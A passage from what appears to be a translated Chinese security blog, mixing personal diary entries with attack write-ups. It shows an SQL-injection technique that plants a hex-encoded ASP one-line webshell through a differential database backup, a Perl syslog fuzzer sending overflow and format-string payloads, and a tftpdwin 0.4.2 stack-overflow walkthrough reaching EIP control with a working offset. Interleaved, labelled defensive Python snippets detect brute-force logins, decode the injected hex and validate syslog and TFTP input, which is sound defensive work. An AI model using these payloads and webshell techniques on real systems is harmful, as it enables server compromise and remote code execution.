
A building I find rather interesting; I had only ever seen it on posters. Photoshopped one shot of it, it looks awful, posting it here as a keepsake :)
PS: Guess where I took it :P
Body-wise, the stomach acid is back... I keep feeling like throwing up; work-wise, the recent experiments haven't been going well, I need inspiration, something must still be missing, blame it on me being a bit slow...; yesterday I dreamed of two phoenixes with completely different forms, no idea what that means, can anyone interpret the dream for me? :P
PS: Lately I look like someone whose business failed: two days without brushing my teeth or showering, a week without shaving -- like a bearded Russian, ugh, so no photo -- don't want to scare everyone. The day after tomorrow I'm off to do customer training -- going to shave now ^@@^
Fixed some of the original bugs, added a script import feature, and made it more standards-compliant (compatible with the NESSUS and X-SCAN writing conventions).
Source code included; download address:
There is no denying that if technology cannot be applied in social production, then however advanced it is, it is wasted... so only technology tied to the market is the way to go....
But the technical field right now is extremely impetuous and pretentious (I can't rule out being part of it myself...), and that is not what I hoped for; I only realized it yesterday while out chatting with friends: I had hoped we could talk sincerely, pool our ideas and discuss our way to a direction, but it turned into one-upmanship, and when I got home and sat down to write a document I found my thoughts more muddled than before the gathering. Clearly, pooling ideas did not achieve the expected effect and added a dose of melancholy instead.
Afterwards I summed up the reasons: besides my inability to control my emotions, I also need to keep an exploratory mindset toward fundamental technology -- humility and the spirit of "seeking common ground while reserving differences". Is it because, with time, I have slowly forgotten that 'lowly spirit' of "a beggar who never stops begging"? And if I had a more likeable personality, how nice would that be? -- the world would be more harmonious...... OVER, off to work :)
At noon I hurriedly found a fast-food place and had a hand-shredded chicken rice; it was terrible and still cost 30 yuan... a set meal, puzzling...
This afternoon I saw a 1.5G beast -- Trend Micro's spam filtering system:
x86; let's look at the model:
The tester told me one word; as for what the word was, clever you can surely figure it out..... I never said anything :P
WEB brute-forcing -- I use the WVS fuzzer
Writer: demonalex[at]dark2s[dot]org
When it comes to WEB brute-forcing, everyone uses Xiao Rong's Suxue (溯雪), but Suxue cannot handle every WEB brute-force with ease (don't say I'm badmouthing old Xiao Rong). Recently, because of work, I ran into a network-management device's WEB PORTAL that needed WEB brute-forcing; look at the HTML source:
…
<script language=javascript>
function login_send()
{
var f, p, page, url, option;
f = document.form_login.forced_in.value;
u = document.form_login.username.value;
p = document.form_login.passwd.value;
pg = document.form_login.page.value;
url = "atm_login?username="+u+"&passwd="+p+"&forced_in="+f+"&page="+pg;
option = "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,favorites=no,resizable=no,left=230,width=520,top=120,height=300";
window.open(url, '_blank', option);
}
</script>
…
<form name='form_login' action='__Javascript:login_send();'>
<input type='hidden' name='forced_in' value='false'><input type='hidden' name=page value=''><input type='hidden' name='redirect_portal_ip' value=''>
<tr height=25%><td colspan='2'><img src='images/login-men.gif' width='177' height='22'></td>
<td width='27%' rowspan='4'><img src='images/l-hand.gif' width='148' height='141'></td></tr>
<tr height=25%><td width='28%' class='inputlabel'>Username:</td>
<td width='45%'><input name='username' type='text' value='' style='width:120px' class='inputbox'></td></tr>
<tr height=25%><td class='inputlabel'>Password:</td>
<td><input type='password' name='passwd' value='' style='width:120px' class='inputbox'></td></tr>
<tr height=25%><td> </td>
<td><input type=image src=images/login-go.gif width='71' height='22'></td></tr>
</from>
…
Here the form's action is handed off to a local custom JavaScript function -- login_send -- to complete; with Suxue:
Seems to be because it calls JavaScript…
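A defender's view of the same portal (added example, not part of the original post): because login_send() puts username and passwd into a GET query string, every login attempt, including a brute-force run, lands verbatim in the web server's access log, and this snippet flags sources hammering atm_login. The log lines, IPs and passwords are constructed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format) for a portal whose
# login handler is the GET endpoint "atm_login" seen in the page's HTML.
SAMPLE_LOG = """\
10.1.1.5 - - [01/Jan/2008:10:00:01 +0800] "GET /atm_login?username=admin&passwd=Passw0rd1&forced_in=false&page= HTTP/1.1" 200 512
10.1.1.5 - - [01/Jan/2008:10:00:02 +0800] "GET /atm_login?username=admin&passwd=Passw0rd2&forced_in=false&page= HTTP/1.1" 200 512
10.1.1.5 - - [01/Jan/2008:10:00:02 +0800] "GET /atm_login?username=admin&passwd=Passw0rd3&forced_in=false&page= HTTP/1.1" 200 512
10.1.1.5 - - [01/Jan/2008:10:00:03 +0800] "GET /atm_login?username=admin&passwd=Passw0rd4&forced_in=false&page= HTTP/1.1" 200 512
10.1.1.9 - - [01/Jan/2008:10:00:05 +0800] "GET /atm_login?username=ops&passwd=correct-horse&forced_in=false&page= HTTP/1.1" 302 0
10.1.1.9 - - [01/Jan/2008:10:00:06 +0800] "GET /images/l-hand.gif HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Split one CLF line into ip/ts/method/url/status plus the parsed path and query."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec

def credentials_in_url(rec):
    """True when a secret-bearing parameter travelled in the query string (so it is now in this log)."""
    return rec is not None and "passwd" in rec["query"]

def find_login_bruteforce(log_text, threshold=3):
    """Return {ip: (attempts, distinct_passwords)} for sources at or above the attempt threshold."""
    attempts = Counter()
    seen_pw = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].endswith("atm_login") and credentials_in_url(rec):
            attempts[rec["ip"]] += 1
            seen_pw[rec["ip"]].update(rec["query"].get("passwd", []))
    return {ip: (n, len(seen_pw[ip])) for ip, n in attempts.items() if n >= threshold}
```

Many distinct passwords for one username from one source is the brute-force signature; the same parser also shows why a login handler should never accept credentials in a GET URL.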
First find a SQL injection point where a ";" plus another SQL statement can be appended, then write a one-line shell and use the backup statement to generate a *.ASP file (the server side of the one-liner). OK, log it. Example:
+++++++++++++++++++++++++++++++++++++++++++++++
Main code for the differential backup:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
In this code, 0x626273 is the hex of the database name to back up, bbs; it can be another name, for example bbs.bak. 0x3C2565786563757465207265717565737428226C2229253E is the hex of <%execute request("l")%>, lp's minimal shell; 0x643A5C7765625C312E617370 is the hex of d:\web\1.asp, i.e. the webshell path you want to back up to.
+++++++++++++++++++++++++++++++++++++++++++++++
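Added example for a defender reviewing captured SQL (not part of the original post): decode the 0x hex literals this technique hides its strings in and flag the stacked BACKUP DATABASE ... TO DISK pattern. The sample statements reuse the values quoted above; the benign query is constructed.

```python
import re

# Constructed samples: the stacked-query shapes discussed above, as they would appear
# URL-decoded in a web server log or WAF capture, plus one harmless query with a hex literal.
SAMPLE_BACKUP = (";declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 "
                 "backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--")
SAMPLE_INSERT = ";insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--"
BENIGN = "select name from products where id=0x10"

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{2,})\b")
# A stacked statement that writes a database file to a caller-chosen path is a file-write primitive.
BACKUP_TO_DISK = re.compile(r"\bbackup\s+database\b.*\bto\s+disk\s*=", re.I | re.S)

def decode_hex_literals(sql):
    """Decode every 0x... literal to text so the analyst sees what the hex was hiding."""
    out = []
    for h in HEX_LITERAL.findall(sql):
        raw = bytes.fromhex(h if len(h) % 2 == 0 else "0" + h)
        out.append(raw.decode("latin-1"))
    return out

def classify(sql):
    """Return the list of findings for one captured statement (empty when nothing suspicious)."""
    findings = []
    stacked = sql.lstrip().startswith(";")
    if stacked and BACKUP_TO_DISK.search(sql):
        findings.append("stacked BACKUP DATABASE ... TO DISK (file write primitive)")
    for text in decode_hex_literals(sql):
        if re.search(r"\.(asp|aspx|php|jsp)$", text, re.I) or "\\" in text:
            findings.append("hex literal decodes to a file path: " + text)
        if "<%" in text or "<?" in text:
            findings.append("hex literal decodes to server-side script: " + text)
    return findings
```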
#!/usr/bin/perl
#syslog Fuzzer v0.1
#jaime.blasco@aitsec.com
#www.aitsec.com
use IO::Socket::INET;
use Getopt::Std;
use POSIX qw(strftime);
getopt('hp', \ my %opts );
$SIG{INT}=\&exitz;
# Ctrl-C handler; the script installs exitz above but originally never defined it
sub exitz { print "\nInterrupted, exiting.\n"; exit 0; }
print "
\t Syslog Fuzzer v0.1 by Jaime Blasco (c) 2008
\t www.aitsec.com
";
if(!defined($opts{h}) or !defined($opts{p})){
print "
-h : Host
-p : Port Number
";
exit;
}
$port = $opts{p};
$host = $opts{h};
@bfo = ('A'x10, 'A'x20, 'A'x40, 'A'x80, 'A'x160,
'A'x320, 'A'x640, 'A'x1280, 'A'x3000, 'A'x5000,
'A'x8000, 'A'x12000, 'A'x15000);
@fse = ("%s%p%x%d", ".1024d", "%.2049d", "%p%p%p%p", "%x%x%x%x",
"%d%d%d%d", "%s%s%s%s", "%99999999999s",
"%08x", "%%20d", "%%20n",
"%%20x", "%%20s", "%s%s%s%s%s%s%s%s%s%s",
"%p%p%p%p%p%p%p%p%p%p",
"%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%",
"%s"x150, "%x"x300);
@int = ("-1", "0", "0x100", "0x1000", "0x3fffffff", "0x7ffffffe",
"0x7fffffff", "0x80000000", "0xfffffffe", "0xffffffff", "0x10000",
"0x100000");
print "Using host: ".$host."\n";
print "Using port: ".$port."\n";
$con = IO::Socket::INET->new(PeerPort=>$port,
Proto=>'udp',
PeerAddr=>$host) or die "socket: $!\n";
#http://www.ietf.org/rfc/rfc3164.txt
#udp SYSLOG PACKET looks like:
#<Priority>Header Message text
# Header = Date Hostname PID
$npriority = '<0>';
$ndate = strftime "%b%e %H:%M:%S", localtime;
$nhostname = "10.0.0.2";
$npid = 'fuzzer[10]';
$nmsg = "Syslog Fuzzer v0.1 by Jaime Blasco (c) 2008";
#fuzzing PRI
#Buffer Overflow
foreach (@bfo) {
$header = $ndate.' '.$nhostname.' '.$npid;
$packet = '<'.$_.'>'.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Format Strings
foreach (@fse) {
$header = $ndate.' '.$nhostname.' '.$npid;
$packet = '<'.$_.'>'.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Integer Overflows
foreach (@int) {
$header = $ndate.' '.$nhostname.' '.$npid;
$packet = '<'.$_.'>'.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#fuzzing header
#fuzzing Date
#Buffer Overflow
foreach (@bfo) {
$header = $_.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Format Strings
foreach (@fse) {
$header = $_.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Integer Overflows
foreach (@int) {
$header = $_.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#fuzzing hostname
#Buffer Overflow
foreach (@bfo) {
$header = $ndate.' '.$_.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Format Strings
foreach (@fse) {
$header = $ndate.' '.$_.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Integer Overflows
foreach (@int) {
$header = $ndate.' '.$_.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#fuzzing PID
#Buffer Overflow
foreach (@bfo) {
$header = $ndate.' '.$nhostname.' '.$_;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Format Strings
foreach (@fse) {
$header = $ndate.' '.$nhostname.' '.$_;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Integer Overflows
foreach (@int) {
$header = $ndate.' '.$nhostname.' '.$_;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#fuzzing msg
#Buffer Overflow
foreach (@bfo) {
$header = $ndate.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$_;
$con->send($packet);
#print $packet;
}
sleep 1;
#Format Strings
foreach (@fse) {
$header = $ndate.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$_;
$con->send($packet);
#print $packet;
}
sleep 1;
#Integer Overflows
foreach (@int) {
$header = $ndate.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$_;
$con->send($packet);
#print $packet;
}
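Receiver-side counterpart to the fuzzer above (added example, not code from the original page): an RFC 3164 parser that rejects the malformed PRI, header and message cases the script generates instead of passing them downstream. The sample datagrams are constructed; the 1024-byte limit is the one RFC 3164 states.

```python
import re

# Constructed samples: one well-formed RFC 3164 datagram and three shaped like the
# fuzzer's cases above (non-numeric PRI, format-string hostname, oversized message).
WELLFORMED = b"<34>Oct 11 22:14:15 mymachine su: 'su root' failed for lonvick on /dev/pts/8"
BAD_PRI = b"<" + b"A" * 40 + b">Oct 11 22:14:15 10.0.0.2 fuzzer[10]: hello"
FMT_HOST = b"<0>Oct 11 22:14:15 %s%p%x%d fuzzer[10]: hello"
HUGE_MSG = b"<0>Oct 11 22:14:15 10.0.0.2 fuzzer[10]: " + b"A" * 5000

MAX_DATAGRAM = 1024   # RFC 3164 section 4.1: the total packet length MUST be 1024 bytes or less
TIMESTAMP = re.compile(rb"^[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d$")   # "Mmm dd hh:mm:ss"
HOSTNAME = re.compile(rb"^[A-Za-z0-9.:-]{1,255}$")   # hostname or IP only; no '%', so no format specifiers

def parse_rfc3164(datagram):
    """Return the parsed fields or raise ValueError; every field is length- and charset-checked."""
    if len(datagram) > MAX_DATAGRAM:
        raise ValueError("datagram exceeds 1024 bytes")
    m = re.match(rb"^<(\d{1,3})>", datagram)      # digits only, so "<-1>", "<0x100>" and "<AAAA...>" fail
    if not m:
        raise ValueError("PRI must be 1-3 digits in angle brackets")
    pri = int(m.group(1))
    if pri > 191:                                 # facility 0-23, severity 0-7
        raise ValueError("PRI out of range")
    rest = datagram[m.end():]
    if len(rest) < 16 or not TIMESTAMP.match(rest[:15]) or rest[15:16] != b" ":
        raise ValueError("bad TIMESTAMP")
    host, _, msg = rest[16:].partition(b" ")
    if not HOSTNAME.match(host):
        raise ValueError("bad HOSTNAME")
    # MSG (TAG + CONTENT) is kept, but control and non-ASCII bytes are replaced before storage
    clean = "".join(c if 32 <= ord(c) < 127 else "?" for c in msg.decode("ascii", "replace"))
    return {"facility": pri >> 3, "severity": pri & 7,
            "timestamp": rest[:15].decode("ascii"), "hostname": host.decode("ascii"), "msg": clean}

def check(datagram):
    """'ok' when the datagram is accepted, otherwise the rejection reason (suitable for an alert)."""
    try:
        parse_rfc3164(datagram)
        return "ok"
    except ValueError as e:
        return str(e)
```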
When I went with a friend to brainwash some people, the friend asked about 磁力; I felt I was merely describing the "whole truth" of 磁力's abilities, yet after hearing it the friend looked at me with a "磁力 is simply too talented" look. Has my bluffing level gone up? Or has 磁力 reached perfection (磁力 won't sleep for days after reading this sentence).... No way to know, haha :D
A few days ago I had the honour of meeting a highly authoritative big name in the industry; when we talked about development directions I told him my ideal. He told me that my ideal cannot be realized within at least 5 years. I said I can wait, like the blind men and the elephant (a different version, though): as long as a blind man keeps feeling, one day he will have felt the shape of the whole elephant... I believe
He also said that ideals keep changing; I don't deny that, but I can say that from 5 years ago until now my ideal has not changed, and I still believe persistence is victory :)
Debug in tftpdwin 0.4.2
writer: demonalex[at]dark2s[dot]org
I remember having seen some information about overflowing tftpdwin (version 0.4.2); perhaps my memory has declined, so I wondered how to find an idea that would tell me how to overflow that baby... Let me show my tools: IDA, OllyDbg, WinDbg, and so on...
1) First, open IDA to create the *.MAP file and export it. Use OllyDbg to attach tftpd.exe, import the MAP file into OllyDbg, and press F9 to run...
2) Now we must find the length of the useless buffer. How??? Write a Perl fuzz script named fuzzer.pl with this content:
*********************************************************
#!/bin/perl -w
use Net::TFTP;
$|=1;
if(!defined($target_ip=shift)){
die("usage: $0 target_ip\n");
}
##################################
#expcode:
$buffer="\x41"x500; #length of useless buffer
$expcode="$buffer";
##################################
$tftp = Net::TFTP->new("$target_ip", BlockSize => 1024);
$tftp->octet;
$tftp->get("$expcode");
exit 1;
*********************************************************
500 bytes? Wrong... EIP is not "\x41"x4... How about 400 bytes? Of course it is not 400 either. But let us look at the content of the stack:
00F5F174 00000000
00F5F178 00406437 返回到 tftpd.00406437 来自 <jmp.&msvcrt.strcpy>
00F5F17C 00F5F19C
00F5F180 41414141
00F5F184 00000080
00F5F188 00240000
00F5F18C 00000001
Ctrl+G opens "go to" for address 00406437, and F2 sets a breakpoint there in OllyDbg.
3) Open WinDbg to attach tftpd.exe; brute-force until EIP equals 0x41414141: the length is 288 (including RET).
4) Change expcode in fuzzer.pl:
##################################
#expcode:
$buffer="\x41"x284; #length of useless buffer
$ret="\x44\x43\x42\x41";
$expcode="$buffer"."$ret";
##################################
5) Finally, Ctrl+F2 in OllyDbg to run tftpd.exe again, then run our new fuzzer.pl and stop it at our breakpoint (00406437); see:
00406437 |. 8D85 D8FDFFFF   lea eax, [ebp-228]                     ; ||
0040643D |. 890424          mov [esp], eax                         ; ||
00406440 |. E8 DB650100     call <jmp.&msvcrt.strlen>              ; |\strlen
00406445 |. 83F8 03         cmp eax, 3                             ; |
00406448 |. 76 16           jbe short 00406460                     ; |
0040644A |. C74424 04 5D6>  mov dword ptr [esp+4], 0042655D        ; |
00406452 |. 8D85 D8FDFFFF   lea eax, [ebp-228]                     ; |
00406458 |. 890424          mov [esp], eax                         ; |
0040645B |. E8 70650100     call <jmp.&msvcrt.strcat>              ; \strcat
00406460 |> 8D85 E8FEFFFF   lea eax, [ebp-118]                     ; |
00406466 |. 894424 04       mov [esp+4], eax                       ; |
0040646A |. 8D85 D8FDFFFF   lea eax, [ebp-228]                     ; |
00406470 |. 890424          mov [esp], eax                         ; |
00406473 |. E8 58650100     call <jmp.&msvcrt.strcat>              ; \strcat
00406478 |> 8B45 10         mov eax, [ebp+10]                      ; |
0040647B |. 05 04010000     add eax, 104                           ; |
00406480 |. 894424 0C       mov [esp+C], eax                       ; |
00406484 |. 8B45 10         mov eax, [ebp+10]                      ; |
00406487 |. 894424 08       mov [esp+8], eax                       ; |
0040648B |. C74424 04 040>  mov dword ptr [esp+4], 104             ; |
00406493 |. 8D85 D8FDFFFF   lea eax, [ebp-228]                     ; |
00406499 |. 890424          mov [esp], eax                         ; |
0040649C |. E8 7F6C0100     call <jmp.&KERNEL32.GetFullPathNameA>  ; \GetFullPathNameA
004064A1 |. 83EC 10         sub esp, 10
004064A4 |. 85C0            test eax, eax
004064A6 |. 75 0C           jnz short 004064B4
004064A8 |. C785 D4FDFFFF>  mov dword ptr [ebp-22C], 0
004064B2 |. EB 0A           jmp short 004064BE
004064B4 |> C785 D4FDFFFF>  mov dword ptr [ebp-22C], 1
004064BE |> 8B85 D4FDFFFF   mov eax, [ebp-22C]
004064C4 |. C9              leave
004064C5 \. C3              retn
Press F8 from 00406437 to 004064C5; when you arrive at 004064C5, stop and look at the content of the stack:
00F5F3C8 41424344
00F5F3CC 00428B00 tftpd.00428B00
hey hey, you did it~
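A defensive counterpart to the fuzzer.pl above (added example, not the author's or tftpdwin's code): a TFTP request parser that bounds and sanitizes the filename before it can reach a fixed-size stack buffer such as the 0x118-byte (280-byte) one at [ebp-118] that the listing hands to strcat. MAX_NAME is an assumed server-side cap; build_rrq only constructs sample datagrams laid out the way Net::TFTP sends them.

```python
import struct

MAX_NAME = 255   # assumed cap: anything longer is refused before it is copied anywhere
OPCODES = {1: "RRQ", 2: "WRQ"}

def build_rrq(filename, mode=b"octet"):
    """Constructed RRQ datagram (RFC 1350): opcode 1, filename, NUL, mode, NUL."""
    return struct.pack("!H", 1) + filename + b"\0" + mode + b"\0"

def parse_request(datagram):
    """Validate an RRQ/WRQ and return (type, filename, mode); raise ValueError for anything malformed."""
    if len(datagram) < 4:
        raise ValueError("short datagram")
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in OPCODES:
        raise ValueError("not a request")
    fields = datagram[2:].split(b"\0")
    if len(fields) < 3 or fields[-1] != b"":      # filename, mode, and the empty piece after the final NUL
        raise ValueError("fields must be NUL-terminated")
    name, mode = fields[0], fields[1].lower()
    if not 0 < len(name) <= MAX_NAME:             # the 500-byte and 284-byte names above are refused here
        raise ValueError("filename length %d outside 1..%d" % (len(name), MAX_NAME))
    if (any(b < 0x20 or b > 0x7e for b in name) or b".." in name
            or name[:1] in (b"/", b"\\") or b":" in name):
        raise ValueError("filename contains control bytes or path traversal")
    if mode not in (b"octet", b"netascii"):
        raise ValueError("unknown mode")
    return OPCODES[opcode], name.decode("ascii"), mode.decode("ascii")

def check(datagram):
    """One-line verdict for a datagram, usable as a log message on the receiving side."""
    try:
        return "ok: %s %s (%s)" % parse_request(datagram)
    except ValueError as e:
        return "reject: " + str(e)
```

Bounding the name at parse time is what makes the later strcpy/strcat into fixed buffers safe, independent of which buffer the copy targets.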
My thinking mode has always been to shut myself in and think for two days; if that yields nothing, give up and choose another approach... because once it goes past two days, besides the heavy psychological pressure there are other burdens too, it feels like hitting a "mission impossible", and self-esteem and drive both fall to rock bottom... so switching thinking mode is sometimes not a bad thing. Actually I personally feel two days is already the limit, because if you can't think of it in those two days, you probably won't any time soon... better to first find some other way that works (to build confidence) and then reconsider :)
The new thinking mode might be to look for other cases of the same type that have already succeeded... or simply abandon that case and adopt another approach that achieves the same effect by different means (one the customer will accept).
I wonder whether there is something wrong with my way of thinking? :P